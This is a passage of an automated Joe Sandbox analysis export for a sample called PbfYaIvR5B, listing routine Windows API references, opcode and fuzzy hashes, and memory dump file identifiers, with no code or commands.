                                                                                                                    • Instruction ID: 18b34c2f8b70bf63ac470a18b83c12dfa581f8c77dc02f737e5bbc3c88701e2b
                                                                                                                    • Opcode Fuzzy Hash: f38b6565f68e022843b6d60c32b8ebc9e399d3a5da718db0ca623c5e3c19e772
                                                                                                                    • Instruction Fuzzy Hash: A8B10631A106099FD765CF2CC48ABA57BE0FB45364F29C658E899CF2E1C339E991CB44
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0005F66A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2325560087-0
                                                                                                                    • Opcode ID: e4eb339e611155ae0bea6fb5ef6e42b3797ab356ab4c161c1c52aaa231bb88ee
                                                                                                                    • Instruction ID: 53733a98afa5b3441256e6d731eac294623c237ab352181d06779f4b73aa0a1f
                                                                                                                    • Opcode Fuzzy Hash: e4eb339e611155ae0bea6fb5ef6e42b3797ab356ab4c161c1c52aaa231bb88ee
                                                                                                                    • Instruction Fuzzy Hash: F0516D75D0560A8FEB68CF68D8816BEBBF4FB48315F248579D805EB250D37CA944CB50
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0004B16B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Version
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1889659487-0
                                                                                                                    • Opcode ID: 35c3942101d0b6a62d91a27dbfbe0518de7f702fc87cf18ab6442f360dce18d7
                                                                                                                    • Instruction ID: c168382cad12e277be1eab5e9ef6c944b23666919a15a9a30c6a8b3e28fb59b4
                                                                                                                    • Opcode Fuzzy Hash: 35c3942101d0b6a62d91a27dbfbe0518de7f702fc87cf18ab6442f360dce18d7
                                                                                                                    • Instruction Fuzzy Hash: 08F01DB4D002588FEB18CB18EC956D973F9FF48315F1042A5D61993390C3B8A9C19FA5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: gj
                                                                                                                    • API String ID: 0-4203073231
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0005F3A5), ref: 0005F9DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 54951025-0
                                                                                                                    • Opcode ID: 2c28f215a71f00b38c7a2f8ff4a75b904d968ab62b8f3ed29188d61eed2129e6
                                                                                                                    • Instruction ID: d1fd91bdef4367bb14112a15144ff9ef01f29b4bf5f70f72056520a45d648d87
                                                                                                                    • Opcode Fuzzy Hash: 2c28f215a71f00b38c7a2f8ff4a75b904d968ab62b8f3ed29188d61eed2129e6
                                                                                                                    • Instruction Fuzzy Hash: A6A011B0A022008FB3008F38AE083083BA8AB0228030A002AA808C0020EA2C80A0AA00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction ID: 8cd8637c2161244a06a0a6071f933ae8d107bfaf3687118200d3870f0b93b8f4
                                                                                                                    • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction Fuzzy Hash: 1362F8716047849FCB25CF28C4906BABBE1BF95305F48896DDCDA8B346D731E949CB11
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction ID: 8cf91588e706c7392356793c78a98f3dfd0985e703e712a4bb26de553760e0ab
                                                                                                                    • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction Fuzzy Hash: 1D62F77160C3458FCB19CF28D8849BABBE1BF95304F18896DEC9A8B346D730E949DB15
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction ID: 886290615fca8202db44fdca3abeab864300cc59dd503f425d68a27243429518
                                                                                                                    • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction Fuzzy Hash: F1525B72A087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D734EA19CB86
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ec097bf397f809060f2215a824df5048bdd4b4c0eec82d5f72f8d4e53354eec4
                                                                                                                    • Instruction ID: 5949314e3dd4a238fdd2f8d5df67c10fc34f40f83d665e4f550af43c8b34aa4a
                                                                                                                    • Opcode Fuzzy Hash: ec097bf397f809060f2215a824df5048bdd4b4c0eec82d5f72f8d4e53354eec4
                                                                                                                    • Instruction Fuzzy Hash: 3012F6B06087058FC728CF28D494ABAB7E0FF94305F10492DE99AC7781E774E959DB45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: fbdbd10a243730239bb7fc7877beaa4fcf1fb573b22abef0774ded31686074d2
                                                                                                                    • Instruction ID: eab8a5554f3be2750a734bbb295efee8e32fe56db5c5a0dfff27a3f4f47e2df7
                                                                                                                    • Opcode Fuzzy Hash: fbdbd10a243730239bb7fc7877beaa4fcf1fb573b22abef0774ded31686074d2
                                                                                                                    • Instruction Fuzzy Hash: 82D1D4B1A083408FCB24CF28D84579BBBE5BF89309F04496DEC899B342D775E909CB56
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f89190f29fcc73565806c71b12590a2d00fb89520447b0b0589075a86688fb90
                                                                                                                    • Instruction ID: b569ee3e0d13f8fedee69f4a0391fe78866769e8f53d21076fab034c53f3ee41
                                                                                                                    • Opcode Fuzzy Hash: f89190f29fcc73565806c71b12590a2d00fb89520447b0b0589075a86688fb90
                                                                                                                    • Instruction Fuzzy Hash: 7BE11B755083948FC344CF69D89046ABFF0BF9A300F46496EF9D497352C239EA19DB92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction ID: 2f62df957055340e1d69fb43545dd65ff434e992c03ea6e58cf8806f0f521545
                                                                                                                    • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction Fuzzy Hash: 7E9175B02043498BCB24EE64D894BFF73D8EBA1309F50092CED86C7282DE74968DC756
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction ID: d393ef5008e47ef1d9fb4dc57a83b4cb754bb395ef79052e42233221192c52af
                                                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction Fuzzy Hash: 068125B17443464BDB24DE68C895BFF37D4EB9130DF00092DED868B283EA6489CD8B56
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b1908dc0ace89bccb954046d8261a5595f29dbaf37898daa5598462f475ec697
                                                                                                                    • Instruction ID: 5d528b73b9599acadde0ec307faba98c5849aef853edb024e4b55fc271a3378b
                                                                                                                    • Opcode Fuzzy Hash: b1908dc0ace89bccb954046d8261a5595f29dbaf37898daa5598462f475ec697
                                                                                                                    • Instruction Fuzzy Hash: 33618A31600F1A67DAB89A689CB67FE23D7EB03B43F14051AE483DF382D651DE428311
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                    • Instruction ID: df762a88902a26425246f562f23bb44e01bd111dca1af91b5f6d0323e72b2ec6
                                                                                                                    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                    • Instruction Fuzzy Hash: FE515961204F4467EFB85A688D66BFF23D79F02303F180929E983CB293D615ED45C3A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0004E30E
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                      • Part of subcall function 00051DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00081030,00000200,0004D928,00000000,?,00000050,00081030), ref: 00051DC4
                                                                                                                    • _strlen.LIBCMT ref: 0004E32F
                                                                                                                    • SetDlgItemTextW.USER32(?,0007E274,?), ref: 0004E38F
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0004E3C9
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0004E3D5
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0004E475
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0004E4A2
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0004E4DB
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0004E4E3
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0004E4EE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0004E51B
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0004E58D
                                                                                                                    Strings
